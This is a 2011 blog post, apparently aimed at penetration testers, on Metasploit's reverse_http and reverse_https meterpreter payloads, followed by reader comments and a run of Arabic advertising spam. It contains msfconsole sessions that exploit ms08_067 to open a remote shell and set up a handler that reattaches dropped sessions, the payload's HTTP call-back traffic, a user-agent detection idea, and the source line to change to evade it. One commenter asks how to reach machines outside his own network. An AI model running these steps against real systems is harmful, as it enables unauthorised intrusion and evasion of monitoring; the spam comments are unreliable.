Meterpreters new reverse_http and reverse_https options

So we’ve all been unlucky enough to have a meterpreter session die on us, and then we’ve all been unlucky enough that we cannot re-exploit the box using the same vulnerability for some reason or another.
No one I know in the White Hat scene likes to use any form of persistence with a payload; and you’d be nuts to use the bind_tcp option through fear of leaving it running. (I’ve heard horror stories of teams turning up to perform a test and finding netcat listeners running on the targets from the previous years test!)
On 29th June 2011 HD Moore released a new set of payloads, specifically the windows/meterpreter/reverse_http(s) payloads we’re interested in.
The most interesting thing about these new payloads is that they are no longer tied into a single TCP session; thus, if you’re connection dies they victim will attempt to reconnect to the listener automatically! Sweet!
This is probably even better news for those taking exams such as CHECK Team Leader and the like where wasting time re exploiting a box could be the difference between pass and fail.
And that’s it really, just use it the same way you would with reverse_tcp.
If you’re using exploit/multi/handler make sure to set the payload correctly to re-establish the session.?
Going on from this it’s important to understand when the payload will terminate. We wouldn’t want it to keep connecting back to the attacker for ever. There are some advanced options that we need to be aware of for the reverse_http and reverse_https payloads.

msf exploit(ms08_067_netapi) > show advanced
Payload advanced options (windows/meterpreter/reverse_http):
   Name           : SessionCommunicationTimeout
   Current Setting: 300
   Description    : The number of seconds of no activity before this session should be killed
   Name           : SessionExpirationTimeout
   Current Setting: 604800
   Description    : The number of seconds before this session should be forcible shut down

SessionExpirationTimeout simply tells the payload to terminate regardless of an open connection or not after this amount of time. Default = 1 week
SessionCommunicationTimeout simply tells the payload to terminate itself after a period of not being able to connect back to the attacker. Default = 5 minutes
There is another option (core_shutdown) that tells the payload to terminate if the session is exited through the metasploit console.
The major benefit of using the reverse_http and reverse_https payloads is that they follow the standard HTTP protocol and can traverse proxies.

msf exploit(ms08_067_netapi) > exploit
[*] Started HTTP reverse handler on
*] Automatically detecting the target…
*] Fingerprint: Windows XP – Service Pack 0 / 1 – lang:English
*] Selected Target: Windows XP SP0/SP1 Universal
*] Attempting to trigger the vulnerability…
*] Request received for /INITM…
*] Staging connection for target /INITM received…
*] Patched transport at offset 486516…
*] Patched URL at offset 486248…
*] Patched Expiration Timeout at offset 641856…
*] Patched Communication Timeout at offset 641860…
*] Meterpreter session 3 opened ( -> at 2011-07-07 13:03:20 +0100
meterpreter > pwd
meterpreter >

If you’re unfortunate to have msfconsole die your end simply start the multi/exploit/handler with the correct payload (http/https)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > exploit
[*] Started HTTP reverse handler on
*] Starting the payload handler…
*] Request received for /CONN_e7LiknUYlilI6RW8/
*] Incoming orphaned session CONN_e7LiknUYlilI6RW8, reattaching…
*] Meterpreter session 1 opened ( -> at 2011-07-07 13:11:00 +0100
meterpreter > pwd

The interesting thing to note here is that this type of attack is going to be relatively easy for sys admins to notice.
Shown here is a sample of how the payload talks back to the attacker:

POST /CONN_e7LiknUYlilI6RW8/ HTTP/1.0
User-Agent: Meterpreter/Windows
Content-Length: 4
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: close
Server: Rex
Content-Length: 0

Simply monitoring your site inbound/outbound traffic for any user agent along the lines of Meterpreter/Windows should throw up some serious concerns if it’s seen. Unfortunately this should also pretty easy for a blackhat attacker to modify:

root@bt:/pentest/exploits/framework3# find . | xargs grep -i ‘Meterpreter\/Windows’ -s1
./external/source/meterpreter/source/server/server_setup.c-     // Allocate the top-level handle
./external/source/meterpreter/source/server/server_setup.c:     remote->hInternet = InternetOpen("Meterpreter/Windows", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
./external/source/meterpreter/source/server/server_setup.c-     if (!remote->hInternet) {


Category Article

11 Responses to “c0decstuff”

  • Anonim says:


    I just found out about you're blog about a hour ago and it's been very very interesting and helpful for me! :)

    I read your blog about meterpreter reverse_http/https sessions ( )

    I have used this kind of payload (java/meterpreter/reverse_http) combined with the java rhino exploit. I can successfully exploit a PC on my network.

    I'm wondering what settings i should use for the lhost and srvhost when I would like to exploit a PC outside of my network. Should i fill in my external IP for the lhost and srvhost? I have a static IP, and port forwarded the necessary ports. I attached a picture to make it a bit more clear what i mean.

    I'm just wondering if i should fill in my external/internal IP for the lhost/srvhost.. I find it kinda confusing lol. I think it should be my external IP, otherwise how would the payload know where to connect too right?

    Thanks for the help, and the amazing blog! :)

  • Great Post!

    A meterpreter is the best way to hack devices

  • افضل شركة تنظيف خزانات ومنازل وشقق بالمدينة المنورة شركة غسيل خزانات ومكافحة حشرات بالمدينة المنورة ونقل عفش بالمدينة المنورة مؤسسة صفوة المدينة
    شركة غسيل خزانات بالمدينة المنورة

  • joudymoha says:

  • joudymoha says:

    فضل شركة نفل عفش بالدمام هل تبحث عن شركات للقيام بخدمات نقل الاثاث الى مدينه الدمام؟ هل انت فى حاجه الان للقيام بمهام النقل والتغليف والتركيب دون ان يتم اى نوع من انواع الخسائر فى الاثاث ؟ كم مرة رغبت فى الانتقال من مكان لأخر,  من هنا تاتى أهمية الاستعانة بشركة نقل عفش بالدمام فعليك ان تستعن بينا الان فشركه نقل عفش بالدمام شركة نقل عفش بالدمام
    شركة نقل اثاث بالدمام
    ن عملية نقل العفش ليست سهلة لكنها  تتطلب خبرة كبيرة وفنيين مدربين على نقل العفش لضمان نقل عفش سليما والحفاظ عليه تفتخر شركة نقل عفش بالدمام بفضل الله ثم بثقتكم  الطيبة  بانها افضل /شركة نقل عفش بالدمامـ ولم ياتى هذا من فراغ او بين ليلة وضحاها ارخص شركة نقل اثاث بالدمام
    شركة نقل اثاث بالجبيل

  • joudymoha says:

    حن شركة متخصصة في ابادة كافة الحشرات المنزلية خاصة الصراصير و بق الفراش وذلك لاننا نستخدم معدات رش مبيد سائل حديثة ومجربة كما اننا نقدم الضمان الساري علي كافة اعمال شركة مكافحة الحشرات بالدمام والجبيلو الخبر مع تفعيل خدمات الضمان الفوري علي كافة اعمال الشركة شركة مكافحة النمل الابيض بالخبر
    شركة مكافحة النمل الابيض بالقطيف
    اذا كنت تبحث عن شركة مكافحة بق الفراش فى الدمام او الخبر او القطيف والجبيل وراس تنورة  فاننا افضل شركة مكافحة حشرات بالدمام والخبر والجبيل كما اننا شركة تتميز بالكفاءة وحسن التعامل مع العملاء ،هل تعلم ان حشرة بق الفراش من الحشرات التي تتغذى بشكل أساسي على الدماء حيث تمتص حشرة بق الفراش شركة مكافحة البق بالقطيف
    شركة مكافحة البق بالدمام

  • joudymoha says:

    تتشرف شركة الشامل بخدمتكم كافضل شركة مكافحة حشرات بالدمام والخبر والجبيل والقطيف وراس تنورة  والتي تقدم خدمات ابادة كافة الحشرات المنزلية الزاحفة او الطائرة عن طريق استخدام افضل المبيدات المستوردة والتي تعطي فاعلية مضمونة حيث نقدم كافة الخدمات مع الضمان من ٣ شهور وحتي عام كامل شركة مكافحة الحشرات بالدمام
    شركات مكافحة حشرات بالخبر والدمام فنحن فى مؤسسة الشرق الأوسط للنظافة نهتم ونحرص وعلى وجه الخصوص برش المنازل بأجود أنواع المبيدات الحشرية لمكافحة الحشرات بكافة أنواعها, فنقوم بإزالة الموكيت والأثاث لرش الأرضيات والفواصل التي بين البلاط كما أن لدينا في شركة مكافحة حشرات بالخبر شركة مكافحة الحشرات بالقطيف
    شركة مكافحة النمل الابيض بالدمام
    فشركتنا تقوم باعمال المكافحة لاى نوع من الحشرات من النمل الابيض – البق – الفئران – الابراص – الصراصير – التعابين – ……. وغيرها من اى نوع من انواع الحشرات المتواجده فى المكان فاذا اراد ان تقضى على اى نوع من الحشرات فاستعن بينا على الفور فى القيام بهذه الخدمة الان. تعد شركة الشامل الدماما من اهم وافضل شركة مكافحة حشرات بالدمام والتى تعتمد على عدد من الخدمات الاساسية شركة مكافحة الفئران بالقطيف

  • joudymoha says:

    ان شركة تنظيف بالخبر تعمل لتنظيف البيوت والشقق والمنازل , من اهم الامور التى تهم اى منزل اليوم هو ان يكون آمن ونظيف وخالى من كافة الحشرات والبكتريا , لتوفير بيئه صحيه مناسبه  للاطفال والكبار  لذلك تقدم شركة تنظيف بالخبر خدمه تنظيف المنازل بالخبر,  وتعد الشركة من افضل شركات تنظيف المنازل بالخبر شركة تنظيف بالخبر
    شركة نظافة بالخبر
    وكما تولى شركه تنظيف بالخبر اهتماما اكبر للمنازل الحديثة القديمة لتنظف كافة مقتنياتها والقصور ذات الفخامه والذوق العالى حتى تعمل عمليه التنظيف على اظهار جمالها والبريق اللامع  , وكذلك تنظيف المنزل بالجوده العاليه المنافسه لاى شركه تنظيف بالخبر  حيث يوجد العديد من شركات التنظيف شركة تنظيف شقق بالخبر

  • joudymoha says:

    شركة نقل عفش بالقطيف
    فضل شركة نقل اثاث بالقطيف تتميز شركة نقل اثاث بالقطيف بأنها من أفضل شركات نقل الاثاث التي تختص بتقديم الخدمات الخاصة بنقل العفش ليس فقط بالقطيف انما لدينا فروع كــ شركة نقل اثاث بالجبيل وشركة نقل اثاث بالدمام وشركة نقل اثاث بالخبر والمفاجاة نقدم لكم مع خدمات النقل خدمة تخزين الاثاث بالدمام والخبر شركة نقل اثاث بالقطيف
    نقل الاثاث بالدمام
    تملك شركة نقل عفش بالظهران الفنين المختصون في فك النجف والأشياء الزجاجية الغالية بطريقة أكثر أمن للحفاظ عليها من الكسر والتلف خلال عملية النقل.يتم فك كل قطعة من الأثاث وتغليفها بشكل كامل وبعناية ودقة كاملة للحفاظ على الأثاث. شركات نقل العفش بالدمام
    تقدم شركة نقل عفش بالدمام والخبر خدمة تخزين الأثاث لديها حسب المدة التي يرغبها العميل، وهذا مع توفيرالنظافة التامة للأثاث.ستعمل شركة نقل اثاث بالقطيف الخامات الحديثة والعالية الجودة من أجل تغليف الأثاث، والتي تحافظ على الأثاث من التلف والكسر والخدش. نقل عفش بالدمام

  • joudymoha says:

    لذلك افضل شركة نقل عفش بالظهران لها كل الامتيازات والخبرات من اجل ان تكون افضل شركة نقل عفش بالظهران وذلك عائد لاحترافيتنا في المجال.لذلك فالشركة تعمل وفقا لآليات معتمدة وكذلك مجربة كما انها متطابقة مع معايير السلامة،فهدفنا الاول والأخير هو رضا العميل،فا افضل شركة نقل عفش بالظهران  تعمل بشكل مرتب ومنظم وذلك كله من اجل ضمان نقل سريع، شركة نقل عفش بالخبر
    شركة نقل اثاث بالخبر
    تسعى شركة نقل اثاث بالقطيف إلى إرضاء العملاء من خلال الطاقم الذي يعمل لديهم ومن خلال الأدوات التي تستخدم في عملية نقل الأثاث من مكان إلى آخر، حيث تستخدم شركة نقل اثاث بالقطيف الأوناش الحديثة التي تستخدم في رفع العفش ووضعه في السيارات حتى لا يتعرض إلى التجريح والخدش شركة نقل اثاث بالجبيل
    شركة نقل عفش بالجبيل

  • joudymoha says:

    قدم شركة نقل اثاث بالقطيف خدمات على اعلى مستوى بأقل الاسعار فاسعارنا لاتقبل المنافسة فنحن شركة نقل اثاث بالدمام رخيص وشركة نقل عغش بالخبر رخيص وشركة نقل اثاث بالجبيل رخيص فهل معنى ذلك اننا لانربح من خلال عملنا بالفعل نربح تعاملكم الغالى معنا فى افضل شركة نقل اثاث بالدمام والجبيل شركة نقل اثاث بالدمام
    أرخص شركة نقل اثاث بالدمام
    شركة نقل عفش فى الدمام تتسم أفضل شركة نقل عفش فى الدمام بأنها تقدم الخدمات عل أعلى مستوى من الخدمة للعملاء حتى يحصلون على خدمة نقل عفش بجودة عالية دون أن يحملون أي أعباء أو ضغوطات تنتج عن نقل العفش كما يحدث في حالة نقل العفش دون الإستعانة بشركات نقل العفش شركة نقل عفش بالدمام
    نقل اثاث بالدمام

What's on Your Mind...

Thank f' u C0mment